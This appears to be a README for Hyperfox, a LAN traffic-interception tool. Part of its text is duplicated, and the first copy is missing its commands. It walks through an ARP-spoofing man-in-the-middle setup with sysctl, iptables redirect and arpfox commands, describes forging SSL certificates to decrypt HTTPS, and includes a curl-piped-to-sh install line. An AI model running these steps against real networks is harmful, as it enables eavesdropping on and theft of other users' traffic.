Hyperfox is a security tool for proxying and recording HTTP and HTTPs communications on a LAN.
Hyperfox is capable of forging SSL certificates on the fly if you provide it with a root CA certificate and its corresponding key. If the target machine recognizes the root CA as trusted, then HTTPs traffic can be successfully decrypted, intercepted and recorded.
This is the development repository, check out the https://hyperfox.org site for usage information.
Get
You can install hyperfox to
You can also grab the latest release from our releases page and install it manually into another location.
Build it yourself
In order to build
Running hyperfox and arpfox on Linux
The following example assumes that Hyperfox is installed on a Linux box (host) on which you have root access or sudo privileges and that the target machine is connected on the same LAN as the host.
We are going to use the arpfox tool to alter the ARP table of the target machine in order to make it redirect its traffic to Hyperfox instead of to the legitimate LAN gateway. This is an ancient technique known as ARP spoofing.
First, identify both the local IP of the legitimate gateway and its matching network interface.
The interface in our example is called
Then identify the IP address of the target, let's suppose it is
Enable IP forwarding on the host for it to act (temporarily) as a common router.
Issue an
We're almost ready, prepare Hyperfox to receive plain HTTP traffic:
Finally, run
and watch the live traffic coming in.
Hyperfox is capable of forging SSL certificates on the fly if you provide it with a root CA certificate and its corresponding key. If the target machine recognizes the root CA as trusted, then HTTPs traffic can be successfully decrypted, intercepted and recorded.
This is the development repository, check out the https://hyperfox.org site for usage information.
Get
hyperfox
You can install hyperfox to
/usr/local/bin
with the following command (requires admin privileges):curl -sL 'https://raw.githubusercontent.com/malfunkt/hyperfox/master/install.sh' | sh
Build it yourself
In order to build
hyperfox
you'll need Go and a C compiler:go install github.com/malfunkt/hyperfox
Running hyperfox and arpfox on Linux
The following example assumes that Hyperfox is installed on a Linux box (host) on which you have root access or sudo privileges and that the target machine is connected on the same LAN as the host.
We are going to use the arpfox tool to alter the ARP table of the target machine in order to make it redirect its traffic to Hyperfox instead of to the legitimate LAN gateway. This is an ancient technique known as ARP spoofing.
First, identify both the local IP of the legitimate gateway and its matching network interface.
sudo route
# Kernel IP routing table
# Destination Gateway Genmask Flags Metric Ref Use Iface
# default 10.0.0.1 0.0.0.0 UG 1024 0 0 wlan0
# ...
wlan0
and the interface's gateway is 10.0.0.1
.export HYPERFOX_GW=10.0.0.1
export HYPERFOX_IFACE=wlan0
10.0.0.143
.export HYPERFOX_TARGET=10.0.0.143
sudo sysctl -w net.ipv4.ip_forward=1
iptables
rule on the host to instruct it to redirect all traffic that goes to port 80 (commonly HTTP) to a local port where Hyperfox is listening to (1080).sudo iptables -A PREROUTING -t nat -i $HYPERFOX_IFACE -p tcp --destination-port 80 -j REDIRECT --to-port 1080
hyperfox
# ...
# 2014/12/31 07:53:29 Listening for incoming HTTP client requests on 0.0.0.0:1080.
arpfox
to alter the target's ARP table so it starts sending its network traffic to the host box:sudo arpfox -i $HYPERFOX_IFACE -t $HYPERFOX_TARGET $HYPERFOX_GW